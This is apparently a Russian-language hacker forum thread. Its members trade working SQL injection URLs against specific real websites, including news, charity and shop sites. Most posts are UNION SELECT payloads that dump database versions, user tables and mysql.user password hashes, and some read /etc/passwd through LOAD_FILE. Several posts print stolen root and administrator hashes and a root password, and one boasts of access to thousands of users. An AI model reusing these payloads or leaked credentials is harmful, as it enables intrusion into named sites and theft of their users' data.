Code: http://www.dynamomania.com/news.php?p=message&id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6/* http://www.dynamomania.com/news.php?p=message&id=-1+union+select+1,2,3,convert(concat(name,char(58),pwd,char(58),command,char(58),email,char(58),url,char(58),country,char(58),city),char),5,6+from+users+limit+0,1/* А вот эта может уже и была... Code: http://www.web-segment.ru/index.php?p=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5,6,7,8,9,10,11,12,13,14,15/*
Code: http://c82.net/article.php?ID=-25+union+select+concat(version(),char(58),user()),2,3,4/* чет с таблицами не получилось =\ + Code: http://www.dukemednews.org/news/article.php?id=-6041+union+select+concat(user,char(58),password),2,3,4,5,version(),7,8+from+mysql.user/*
Code: http://freejob.ru/message_to_vacancy.php?id_m=-1'+UNION+SELECT+1,2,3,4,5,6,7,concat(user,0x3a,password),9,11,12,13,14,15,16,17,18,19,20+FROM+mysql.user/* root:nhfdthcf
Code: http://bila.com.ua/price_view.php?price_id=-1+union+select+1,2,3,4,5,6,7,concat(database(),char(58),user(),char(58),version()),9,10,11,12,13,14/*
Code: http://www.digitalidworld.com/modules.php?op=modload&name=News&file=article&sid=-89+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(char(58),version(),user(),database()),16,17,18,19,20,21,22,23/*&mode=chrono&order=0 Вывод в тайтле( сам чуть не прозевал=\) Code: http://www.michaeljfox.org/news/article.php?id=-5+union+select+convert(concat_ws(char(58),version(),user(),database())+using+latin1)/*
бгг =) Code: http://bila.com.ua/price_list.php?searchtype=33&searchsub=-1+union+select+1,2,version()/* www.f1-world.ru 5 мускуль Code: http://www.f1-world.ru/news/news.php3?idnews=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
Code: http://www.fpp-iis.ru/iss.php?page=-1+union+select+1,2,3,4,5,6/* Возможно ли что-нибудь дальше?
для mysql.user запрос не прокатил... может быть есть другая база данных... SELECT command denied to user 'tib_ips'@'xxx.xxx.xxx.xxx' for table 'user'
Code: http://www.interfax-religion.ru/?act=news&div=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4,5,6,7,8,9,10,11,12,13/* http://www.interfax-religion.ru/?act=news&div=-1+union+select+concat(id,char(58),email),2,3,4,5,6,7,8,9,10,11,12,13+from+subscribe+limit+0,1/* Code: http://askbook.kiev.ua/books.php?book=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14,15/*
LOAD_FILE('etc/passwd') проходит, но выдает путой результат ^_____^ На загрузку файлов не проверял. На ошибки внимания не обращаем, имена файлов берутся из базы, поэтому ругает за отсутсвие.
Code: http://www.di-do.ru/index.php?all=1&c1=-1+union+select+1,concat(email,0x3a,pass),3,4+from+clients/*
compoundsemi.com Code: http://compoundsemi.com/documents/view/generic.php?id=-6913/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(name,0x3a,password),18+from+admin+limit+2,1/* C пасами жопа =\
Можно книжек заказать =) Code: http://petropol.com/browse/fetch.php3?id=-104544+union+select+1,2,3,LOAD_FILE(0x2f6574632f706173737764),5,6,7,8,9,10,11,12,13,14,15,16,17,19,20,21,22,23,24,25,26,27,28,29,30,31/*&type=book
Code: http://oz.com.ru/st.php?id=218+union+select+concat(database(),0x3a,version()),2,3,4,5/* Code: http://gapart.com/ru/he/work.php?catid=1&page=1&id=-4+union+select+1,2,version(),4,5,6/*
akusherstvo.ru Code: http://www.akusherstvo.ru/magaz.php?action=cat_show&ordby=type&type_active=-1+union+select+concat(user,0x3a,password),2+from+mysql.user/* root:5d1a051535bd4dcd также чем-то могут быть интересны таблицы admin, myuser, phpbb_users, a_admin пример скули форум: Code: http://www.akusherstvo.ru/magaz.php?action=cat_show&ordby=type&type_active=-1+union+select+concat(username,0x3a,user_password),2+from+phpbb_users+limit+2,1/* Администратор:3693dc9bc65e54f85826ddca773dbd5b 8.5k users в общем-то, там еще 150 таблиц, есть простор для мозгового штурма)
Может и было... Code: http://www.cybertown.ru/catalog.php?action=site&id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* http://www.cybertown.ru/catalog.php?action=site&id=-1+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables+limit+16,1/* http://www.cybertown.ru/catalog.php?action=site&id=-1+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.columns+where+table_name=char(97,99,99,111,117,110,116,115)+limit+0,1/* http://www.cybertown.ru/catalog.php?action=site&id=-1+union+select+1,2,3,concat(ID,char(58),LOGIN,char(58),PASS,char(58),FIO,char(58),EMAIL),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+accounts+limit+0,1/* Code: http://www.divanodrom.ru/textile.php?id=-1+union+select+convert(concat(database(),char(58),user(),char(58),version()),char)/*
http://www.fmodels.net - я хекнул много блондинок, теперь они все мои =) Code: http://www.fmodels.net/news.php3?id=-10+union+select+1,concat(user,0x3a,password),3,4,5,6,7+from+mysql.user+limit+1,3/* Надо с лимитом играться =\ Code: http://redcame.org.ar/news.php3?id=-550+union+select+1,2,3/*
2 zl0ba: зачем лимит? сразу весь список Code: http://www.fmodels.net/news.php3?id=-10+union+select+1,2,concat(user,0x3a,password),4,5,6,7+from+mysql.user/* а по твоему линку вообще вывода не увидел, мб глюки..
Ну и еще один интернет - магазин... root:7c09cac038aef27b Админку не нашел, в robots.txt тоже не прописано =\
